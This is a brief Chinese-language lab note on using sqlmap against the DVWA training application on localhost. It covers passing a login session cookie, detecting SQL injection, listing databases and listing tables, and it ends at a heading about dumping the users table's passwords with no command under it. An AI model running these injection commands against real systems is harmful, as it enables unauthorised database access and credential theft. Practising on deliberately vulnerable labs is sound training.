前置关键说明
DVWA 存在登录 Cookie 校验,不带 Cookie 扫描会直接 302 跳转登录页,无法注入,必须带上登录 Cookie 参数。
##python sqlmap.py -u "http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id=1\&Submit=Submit" --cookie "PHPSESSID=你的session值; security=low" --batch
python sqlmap.py -u "http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id=1\&Submit=Submit" --cookie "PHPSESSID=orcs9ce2kse8t2cjckh7ce418h;; security=low" --batch

查询所有数据库
python sqlmap.py -u "http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id=1\&Submit=Submit" --cookie "PHPSESSID=orcs9ce2kse8t2cjckh7ce418h; security=low" --batch --dbs

dvwa 库下所有表
python sqlmap.py -u "http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id=1\&Submit=Submit" --cookie "PHPSESSID=orcs9ce2kse8t2cjckh7ce418h; security=low" --batch -D dvwa --tables

导出 users 表全部账号密码(核心脱库)
